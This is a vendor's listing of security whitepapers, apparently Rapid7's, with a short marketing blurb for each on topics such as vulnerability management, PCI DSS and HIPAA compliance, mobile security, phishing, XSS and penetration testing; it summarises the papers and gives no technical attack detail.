White Papers

You Can't Control It, But You Can Protect it: Enabling Security for Cloud, Mobile, and Social Applications

You Can't Control It, But You Can Protect it: Enabling Security for Cloud, Mobile, and Social Applications

Security practices focused on on-premise systems can’t protect your organization from breaches and attacks as they once did. The line between on-premise and off-premise technologies isn't just blurred; it's barely relevant. Your ability to monitor users must encompass on-premise, cloud and mobile technology, or you might as well forget about security. This paper discusses reasons why visibility is so essential, and outlines how you can use visibility beyond and within the firewall to develop policies and processes that protect what you can’t control.

Security Guide: How to Evade Anti-Virus Detection

Security Guide: How to Evade Anti-Virus Detection

Penetration testing can give you a clear view of the vulnerabilities that can easily be exploited within your environment; however, organizations need to be able to understand and test their users' behavior without anti-virus programs stopping these tests in their tracks. A great way to explore that user behavior is by deploying social engineering programs during a pen test. In this guide, penetration testers will learn how to evade anti-virus detection on target machines.

The Nexpose Expert System: Using an Expert System for Deeper Vulnerability Scanning

The Nexpose Expert System: Using an Expert System for Deeper Vulnerability Scanning

This paper explains how Rapid7 Nexpose uses an expert system to achieve better results in vulnerability scanning compared to traditional procedural methods. After a brief discussion of the product objectives and implementation, this paper explores the use of expert systems to achieve accurate and detailed vulnerability results.

The Unwitting Danger Within - Understanding and Mitigating User-Based Risk

The Unwitting Danger Within - Understanding and Mitigating User-Based Risk

There is a security risk in your organization that can render all of your security controls worthless with a single click. It is dynamic and changes in real-time. It is the weakest link in your infrastructure, and no singular security appliance or software exists that can lock it down. What's more, you have not one but hundreds-perhaps thousands-of these risks, each sitting behind a desk in your organization. While users represent the single largest security risk to organizations, there are measures you can put in place to mitigate the risk they can introduce to your organization. This eBook explores the different kinds of user-based risks in today's corporate environment, including mobile devices and cloud services, and gives actionable guidance on how to mitigate these risks.

Mobile Security Guide: Protect Your Organization From Mobile Malware

Mobile Security Guide: Protect Your Organization From Mobile Malware

As mobile devices become more common, cybercriminals see them as having huge profit potential, and aim to gain access to the user's confidential personal and financial information. In this Mobile Security Guide, we'll walk you through the mobile malware landscape and what you need to know to keep your organization's data safe.

Mobile Security Guide: Policies To Mitigate Device Threats

Mobile Security Guide: Policies To Mitigate Device Threats

This first-in-a-series guide gives you brief and easy recommendations on policies you can set at your organization to secure mobile devices, mitigate mobile threats, and secure company data.

Combating Phishing Attacks: How to Design an Effective Program to Protect Your Organization Against Social Engineering

Combating Phishing Attacks: How to Design an Effective Program to Protect Your Organization Against Social Engineering

It seems like we've been hearing a lot about phishing in the news in recent years, and this threat hasn't abated yet. Why are attacks via phishing -and social engineering in general -so prevalent and so effective?  This whitepaper examines the many different methods employed in phishing attacks and social engineering campaigns, and offers a solution-based approach to mitigating risk from these attack vectors.

Risk Visibility and Management: How IT Security Teams Can Enable Speed With Control

Risk Visibility and Management: How IT Security Teams Can Enable Speed With Control

As fast as organizations move, IT security needs to move even faster. There are constant pressures to streamline operations and safeguard valuable assets while keeping up with a deluge of new technologies and maintaining usability for employees, partners, vendors, investors, and more. The critical capability to balance this need for speed with demand for security is visibility. Download this whitepaper to learn more.

Demystifying PCI DSS: Expert Tips and Explanations to Help You Gain PCI DSS Compliance

Demystifying PCI DSS: Expert Tips and Explanations to Help You Gain PCI DSS Compliance

The Payment Card Industry Data Security Standards (PCI DSS), with its over 200 requirements, can seem like a daunting set of regulations. Nonetheless, if your organization handles any kind of credit card information, you must be PCI DSS compliant. As difficult as this can seem, you can get expert help with our new eBook: Demystifying PCI DSS: Expert Tips and Explanations to Help You Gain PCI DSS Compliance.

Three Steps to Mitigate Mobile Security Risks

Three Steps to Mitigate Mobile Security Risks

Read this whitepaper to learn about the mobile security landscape, key mobile security risks, and how to mitigate these risks in order to protect company data.

The Dynamic Nature of Virtualization Security

The Dynamic Nature of Virtualization Security: The need for real-time vulnerability management and risk assessment

The cornerstones of a proactive security strategy are vulnerability management and risk assessment. However, traditional “scan-and-patch” vulnerability scanning approaches are inadequate for dynamic, virtualized environments. Traditional scanners cannot track changes in real time, so they cannot accurately measure constantly changing risks. Anyone charged with securing IT assets needs to understand the dynamic security risks inherent to virtualized environments, and more importantly, what to do to mitigate those risks. This whitepaper explores the challenges of securing a virtualized environment and gives actionable solutions to address them.

Leveraging Security Risk Intelligence

Leveraging Security Risk Intelligence - The strategic value of measuring Real Risk™

The ongoing struggle to prevent hackers from breaching assets and malware from gaining a foothold requires a vulnerability management strategy that begins with a comprehensive measurement of security risk. Starting with an understanding of the need for effective risk management followed by a definition of the elements of risk, this whitepaper presents the advantages and strategic value of Rapid7 Security Risk Intelligence for your environment and illustrates its operation.

What is Penetration Testing? An Introduction for IT Managers

What is Penetration Testing? An Introduction for IT Managers

A penetration test is often a key requirement for compliance with key regulations. But while many organizations know they need penetration testing, it can be hard to know how to fit them in to a larger security program, or even how to get started. Our whitepaper, "What is Penetration Testing? An Introduction for IT Managers," is a clear and succinct introduction to the core principles and best practices of penetration testing.

Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform

Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform

Organizations have traditionally viewed vulnerability scanners as a tactical product, largely commodotized, and only providing value around audit time. The tide is turning and there is a clear shift from largely compliance-driven messaging to a more security-centric view.

The CISO's Guide To Virtualization Security

The CISO's Guide To Virtualization Security

This guide describes the security challenges within virtualized environments and shows how to apply the concepts of Forrester's Zero Trust Model of information security to secure the virtual environment effectively.

How to Justify Your Security Assessment Budget

How to Justify Your Security Assessment Budget

Penetration testing has been established as a standard security tool in the past years: While the topic was mostly used in the military and intelligence services until recently, penetration testing is now an integral part of regulations such as the Payment Card Industry Data Security Standard (PCI DSS). Penetration testing is now even featured in movies and TV shows. This is not surprising since penetration testing is not only an exciting field to word in but also tangible business benefits. Penetration testing experts seem to have a bright future. One topic that a lot of technical IT professionals have problems with - maybe you as well - is selling security to their non-technical management. This white paper aims to help you with this endeavor: explaining the benefits of penetration testing to the business and securing the necessary budget.

Whitepaper Protecting Patient Health

Protecting Patient Health Information in the HITECH Era

The American Healthcare system is getting a complete facelift thanks to incentives to adopt Health Information Technology introduced by the Health Information Technology for Economic and Clinical Health (HITECH) Act. The HITECH Act contains tools for the enforcement of HIPAA regulations, as well as incentives to accelerate the adoption of information systems that reduce costs, gain efficiencies, and ultimately improve patient care while keeping patient health information secure. This paper examines the HITECH Act, the enforcement mechanisms the HITECH Act provides for HIPAA, and the key security challenges healthcare services face in order to protect patient health information as part of becoming HIPAA compliant.

Whitepaper Cross Site Scripting

Managing Cross Site Scripting (XSS) - The Number One Item on OWASP's Top Ten List

This white paper discusses the security risk that cross site scripting (XSS) represents for organizations. The white paper outlines the different forms of XSS vulnerabilities including reflective, persistent and DOM-based, why they are dangerous, and how to prevent them.

Whitepaper Best Practices to Protect the Cardholder Data Environment and Achieve PCI Compliance

Best Practices to Protect the Cardholder Data Environment and Achieve PCI Compliance

Cyber-attacks designed for financial gain are on the rise, targeting proprietary information including customer and financial information. With over 127 million records exposed in 2007 in the US alone, attacks are becoming increasingly more sophisticated. Learn more about best practices to protect the cardholder data environment and achieve PCI compliance.

Whitepaper Understanding and Deploying the PCI Data Security Standard

Understanding and Deploying the PCI Data Security Standard

PCI is one of the most stringent and detailed security requirements for retailers and merchants. This document outlines the different requirements to meet PCI compliance, maintain a secure network, protect cardholder data, maintain a vulnerability management program, implement access controls and regularly monitor and test networks.

IT Security in Higher Education White Paper

IT Security in Higher Education White Paper

According to Analysts, the Higher Education sector is the most breached of any industry. This white paper outlines key reasons why universities are more affected by security issues and how they can better prepare themselves to address IT security and vulnerability management challenges.